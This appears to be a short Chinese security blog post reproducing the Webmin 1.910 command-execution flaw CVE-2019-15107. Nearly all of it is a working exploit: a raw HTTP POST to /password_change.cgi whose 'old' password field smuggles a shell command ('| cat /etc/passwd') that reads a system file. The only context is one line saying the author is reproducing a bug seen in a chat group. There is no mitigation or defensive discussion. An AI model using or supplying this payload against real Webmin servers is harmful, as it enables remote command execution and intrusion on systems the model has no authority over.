QQ love member No. 3 seed player

know it then do it && APT086&QQ愛安全实验室成员

webmin_CMS命令执行漏洞复现(CVE-2019-15107)

19 Aug 2019 » security

[TOC]

正文

看到群里表哥曝出 webmin CMS 命令执行漏洞,所以复现下。

version: Webmin 1.910

POST /password_change.cgi HTTP/1.1

Host: 107.**.**.**:30000

Referer: https://107.**.**.**:30000/sesss.cgi

Content-Type: application/x-www-form-urlencoded

Content-Length: 73

user=demo&pam=&expired=2&old=test | cat /etc/passwd&new1=test2&new2=test2

RT:

webmin


「 转载请声明博客地址及APT086&QQ愛安全实验室 」